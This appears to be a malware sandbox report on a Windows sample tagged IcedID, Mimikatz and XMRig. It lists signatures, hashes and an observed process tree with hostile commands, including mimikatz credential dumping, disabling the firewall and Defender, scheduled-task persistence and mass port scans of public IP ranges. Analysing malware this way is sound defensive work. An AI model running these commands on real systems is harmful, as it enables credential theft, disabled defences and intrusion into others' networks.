Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
16-09-2024 16:16
General
-
Target
2024-09-16_e4bc4a4df35485ab836b0b49e826e34e_hacktools_icedid_mimikatz.exe
-
Size
8.6MB
-
MD5
e4bc4a4df35485ab836b0b49e826e34e
-
SHA1
0665f2230c62c54afbae01e0a5c4aa12ee941cd8
-
SHA256
a00a2335802e2af1f91317486b049d11cb7986ba8813beadf9b0c1eeab88ff00
-
SHA512
1a3593c9b2762a15e9b27db92fd01f41edca209ffa75a8268e6513712a4be8b1d755b138a614e9f15f82d97a5049cd9cc8bb1720622f354dd5a4a8747a758a9c
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (20033) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\awlverzbi\nqrzsm.exe"C:\Windows\TEMP\awlverzbi\nqrzsm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-16_e4bc4a4df35485ab836b0b49e826e34e_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-16_e4bc4a4df35485ab836b0b49e826e34e_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bekggbli\iuclszl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\bekggbli\iuclszl.exeC:\Windows\bekggbli\iuclszl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\bekggbli\iuclszl.exeC:\Windows\bekggbli\iuclszl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exeC:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exeC:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\dvpvfgkqq\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\dvpvfgkqq\Corporate\vfshost.exeC:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 772 C:\Windows\TEMP\dvpvfgkqq\772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 384 C:\Windows\TEMP\dvpvfgkqq\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2064 C:\Windows\TEMP\dvpvfgkqq\2064.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2564 C:\Windows\TEMP\dvpvfgkqq\2564.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2784 C:\Windows\TEMP\dvpvfgkqq\2784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2904 C:\Windows\TEMP\dvpvfgkqq\2904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2840 C:\Windows\TEMP\dvpvfgkqq\2840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3848 C:\Windows\TEMP\dvpvfgkqq\3848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4020 C:\Windows\TEMP\dvpvfgkqq\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2900 C:\Windows\TEMP\dvpvfgkqq\2900.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3368 C:\Windows\TEMP\dvpvfgkqq\3368.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 1860 C:\Windows\TEMP\dvpvfgkqq\1860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4848 C:\Windows\TEMP\dvpvfgkqq\4848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4296 C:\Windows\TEMP\dvpvfgkqq\4296.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2240 C:\Windows\TEMP\dvpvfgkqq\2240.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3752 C:\Windows\TEMP\dvpvfgkqq\3752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2692 C:\Windows\TEMP\dvpvfgkqq\2692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exenvmribbga.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\skaigk.exeC:\Windows\SysWOW64\skaigk.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe1⤵
-
C:\Windows\ime\iuclszl.exeC:\Windows\ime\iuclszl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
25.8MB
MD5ec23fdfdf93a807e37902fb8d75688c4
SHA1ece8447e7218024801d7e0fc5d440b4b7c1a30b0
SHA2562233642c3f8998f1bcab06e3793cf2a9dd7bb438ff7faadd9e98e6e28031bfaf
SHA51231fddac033dec8c0e2b0ecda40d7856b48e623bc2655699cbf3723497be4d0d20fa89175967639e42c4f6a978f9dfad890d317b765fafce0ae0c7ae0df00c667
-
Filesize
4.1MB
MD587191596c98e97fde605cdd9c2b3f9bc
SHA1ee0ee54385d051380a3abe62e96dc46ba5b3856e
SHA256421a7e06e42f8171016cf1724498023738ec3042cdce6d017da928f78eeb1fb7
SHA512816ca288856c82d447eed26aff53859be5faeb92e910caaf2ef9ef1ad1823284fc0cd6e549b8f5e4851003526eaf7d079fc6b67762e6ab9348659d57d7d5f645
-
Filesize
1.2MB
MD514193bb47f5d95fa16a0b41f030ae0c5
SHA1cb06fb337aa9616d2abe9842ba024de7907a9ada
SHA256921aec777c7d82b723a361c74f02ad42f9297d9d5ce5d64735d092f4e207667d
SHA51206e4393adc31466a0ccb3a11739f81d302de4b377e34680cf3f7abc1fb03dd6849aca23c38ae5359c98492ea001fe0bf866053e9cf55f420e0817cc5601dce49
-
Filesize
3.5MB
MD58feb9b1fa27c546da1130ae7561bc23a
SHA12aaabddc9814e193c8621beed4e63eaab72711d4
SHA256f9ec709706f5fbaefd7b3e70a5c7d902b553a975b0b4f37c370c9c630008188e
SHA512aff3a8fcd7ee8774a01d02e5ddde8bf6150b101bae19ea5ed2cfd5eea0dd610fc5f5a56e267e7eaac7ad3390369299c7aa97165338ecf2f927c3a2a88a53568e
-
Filesize
7.7MB
MD5484bf8a637eafcd6d8a6c4f9e29d8ff8
SHA150c05d404b63f184425a6ec7f23bc8c4413fc55a
SHA256ada8a0c1bee46a11888e12b93e7ec2cd5aeabe84281b3122b378c1ef0ce67a9f
SHA5127cd558dc7c0253aed1a4a1a92a889d6dad35f9b7e25b32a97f4574bd16b6028e7224447d94c1a1a07775e0620001a31afdf9ad1d5db72b808ca4d78cdebfc2f2
-
Filesize
800KB
